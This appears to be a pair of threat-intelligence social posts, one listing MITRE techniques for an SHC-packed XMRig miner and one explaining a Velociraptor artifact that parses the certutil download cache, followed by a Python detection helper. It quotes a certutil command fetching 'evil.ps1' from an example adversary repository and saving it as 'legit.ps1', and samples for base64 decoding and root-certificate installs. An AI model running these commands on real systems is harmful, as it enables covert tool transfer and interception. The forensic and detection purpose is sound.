From a #ThreatIntelligence perspective, the #TTPs would be:
- #T1059.003: Command and Scripting Interpreter: Unix Shell. An SHC payload still needs a shell present on the system to run, and the code inside the payload is, in fact, a shell script.
- #T1027.002: Obfuscated Files or Information: Software Packed with #SHC.
- #T1622: Debugger Evasion by using SHC with '-r'.
- #T1105: Ingress Tool Transfer by downloading payloads from Github.
- #T1496: Resource Hijacking with #XMRig.
#threatintelligence #ttps #t1059 #t1027 #shc #t1622 #t1105 #t1496 #xmrig
🦖Day 57 of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: Windows.Forensics.CertUtil
Link: https://docs.velociraptor.app/artifact_references/pages/windows.forensics.certutil/
CertUtil is a built-in tool used to manage certificates on Windows systems.
It can be used for living off the land: (base64) decoding/encoding data, calculating file hashes, and downloading files from the internet.
https://attack.mitre.org/techniques/T1105/
https://attack.mitre.org/techniques/T1140/
This can be useful for an attacker trying to hide their intentions and/or facilitate tool transfer for lateral movement and persistence. Last, certutil can also be used for installing browser root certificates to allow for AiTM/MiTM attacks.
In the past, certutil has been used maliciously by the following groups:
- APT28
- APT41
- Rancor
- Turla
- and others
#S0160
https://attack.mitre.org/software/S0160/
Certutil maintains a cache of downloaded files. This cache can contain valuable metadata.
This artifact parses the metadata within the certutil cache to establish what was downloaded, and when it was downloaded.
In this instance (shown in the image), a file called 'evil.ps1' was downloaded. 👀
The following command was run to generate this output:
'certutil -urlcache -split -f https://raw.githubusercontent.com/ExampleAdversary/scripts/main/evil.ps1 legit.ps1'
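As an added example (not part of the post or of the Velociraptor artifact), here is a small Python triage helper that classifies certutil command lines from process-creation telemetry into the techniques discussed above: cache downloads (T1105), (de)obfuscation (T1140) and root-store certificate installs. The sample command lines are constructed, and the switch-to-technique mapping is my own assumption based on the post's descriptions.

```python
import ntpath
import re
import shlex
from typing import Dict, List

# Constructed sample process-creation command lines (not real telemetry);
# the first one is the download command shown in the post.
SAMPLE_CMDLINES: List[str] = [
    "certutil -urlcache -split -f https://raw.githubusercontent.com/ExampleAdversary/scripts/main/evil.ps1 legit.ps1",
    r"C:\Windows\System32\certutil.exe /decode payload.b64 payload.exe",
    "CertUtil.EXE -addstore -f Root evil-ca.cer",
    r"certutil -hashfile C:\Windows\notepad.exe SHA256",
    "powershell.exe -nop -c Get-Date",
]

# certutil switches grouped by the technique they map to in the post
# (assumed mapping, derived from the post's descriptions).
RULES: Dict[str, set] = {
    "T1105": {"urlcache", "verifyctl"},                       # fetch into the cache
    "T1140": {"decode", "decodehex", "encode", "encodehex"},  # (de)obfuscation
    "ROOT_CERT_INSTALL": {"addstore"},                        # only for the Root store
}

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def classify_certutil(cmdline: str) -> Dict[str, object]:
    """Map one command line to the certutil techniques it exhibits."""
    result: Dict[str, object] = {"is_certutil": False, "techniques": [], "url": None, "force": False}
    tokens = shlex.split(cmdline, posix=False)   # keep Windows backslashes intact
    if not tokens:
        return result
    exe = ntpath.basename(tokens[0].strip('"')).lower()
    if exe not in ("certutil", "certutil.exe"):
        return result
    result["is_certutil"] = True
    # Accept both "-" and "/" switch prefixes, case-insensitively.
    switches = {t[1:].lower() for t in tokens[1:] if t[:1] in ("-", "/")}
    args = [t.lower() for t in tokens[1:] if t[:1] not in ("-", "/")]
    result["force"] = "f" in switches                 # -f: overwrite / force fetch
    for technique, flags in RULES.items():
        if switches & flags and not (technique == "ROOT_CERT_INSTALL" and "root" not in args):
            result["techniques"].append(technique)
    match = URL_RE.search(cmdline)
    result["url"] = match.group(0) if match else None
    return result


def scan(cmdlines: List[str]) -> List[Dict[str, object]]:
    """Return a finding for every certutil invocation in the input."""
    return [{"cmdline": c, **hit} for c in cmdlines if (hit := classify_certutil(c))["is_certutil"]]
```

Running `scan(SAMPLE_CMDLINES)` flags the four certutil invocations and ignores the PowerShell line; the hashfile call is reported as certutil use with no technique attached, which is the benign baseline you would tune against.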
You can use the following ART test (maybe with other options, such as 'verifyctl') if you would like to test this artifact yourself:
As mentioned previously, certutil can be also used for other operations such as decoding/encoding data.
You can also try the following ART test to experiment with this functionality:
That's it for now! Stay tuned to learn about more artifacts! 🦖
Also, check out the link below for a blog that analyzes the various artifacts left from certutil usage!
u0041.co/blog/post/3
#velociraptor #artifactsofautumn #t1105 #t1140 #s0160